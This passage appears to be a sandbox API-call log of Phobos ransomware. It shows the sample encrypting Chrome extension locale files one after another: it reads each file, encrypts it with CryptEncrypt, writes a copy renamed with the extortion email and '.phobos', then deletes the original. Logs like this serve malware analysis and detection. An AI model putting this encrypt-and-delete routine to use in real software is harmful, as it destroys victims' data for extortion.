halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json")) returned 1 [0154.000] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.001] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=276) returned 1 [0154.001] CloseHandle (hObject=0x130) returned 1 [0154.001] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json")) returned 0x2020 [0154.001] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.001] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.001] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.002] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0154.002] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.002] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x114, lpOverlapped=0x0) returned 1 [0154.002] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0154.002] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0154.004] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0154.004] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.004] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.004] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.004] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.004] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.004] CloseHandle (hObject=0x130) returned 1 [0154.004] CloseHandle (hObject=0x138) returned 1 [0154.004] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json")) returned 1 [0154.005] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.006] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=331) returned 1 [0154.006] CloseHandle (hObject=0x138) returned 1 [0154.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json")) returned 0x2020 [0154.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.006] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.006] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.007] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0154.007] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.007] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x14b, lpOverlapped=0x0) returned 1 [0154.008] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150, dwBufLen=0x150 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150) returned 1 [0154.008] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x150, lpOverlapped=0x0) returned 1 [0154.009] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0154.009] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.009] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.009] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.009] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.009] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.009] CloseHandle (hObject=0x138) returned 1 [0154.009] CloseHandle (hObject=0x130) returned 1 [0154.503] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json")) returned 1 [0154.587] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.588] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=204) returned 1 [0154.588] CloseHandle (hObject=0x130) returned 1 [0154.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json")) returned 0x2020 [0154.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.589] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.589] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.589] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0154.589] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.589] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xcc, lpOverlapped=0x0) returned 1 [0154.590] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0154.590] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0154.591] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0154.591] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.591] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.591] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.591] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.591] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.591] CloseHandle (hObject=0x130) returned 1 [0154.591] CloseHandle (hObject=0x14c) returned 1 [0154.591] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json")) returned 1 [0154.592] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.593] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=227) returned 1 [0154.593] CloseHandle (hObject=0x14c) returned 1 [0154.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json")) returned 0x2020 [0154.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.593] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.593] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.594] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0154.594] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.594] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe3, lpOverlapped=0x0) returned 1 [0154.594] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0154.595] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0154.596] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0154.596] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.596] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.596] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.596] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.596] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.596] CloseHandle (hObject=0x14c) returned 1 [0154.596] CloseHandle (hObject=0x130) returned 1 [0154.596] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json")) returned 1 [0154.597] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.598] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=212) returned 1 [0154.598] CloseHandle (hObject=0x130) returned 1 [0154.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json")) returned 0x2020 [0154.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 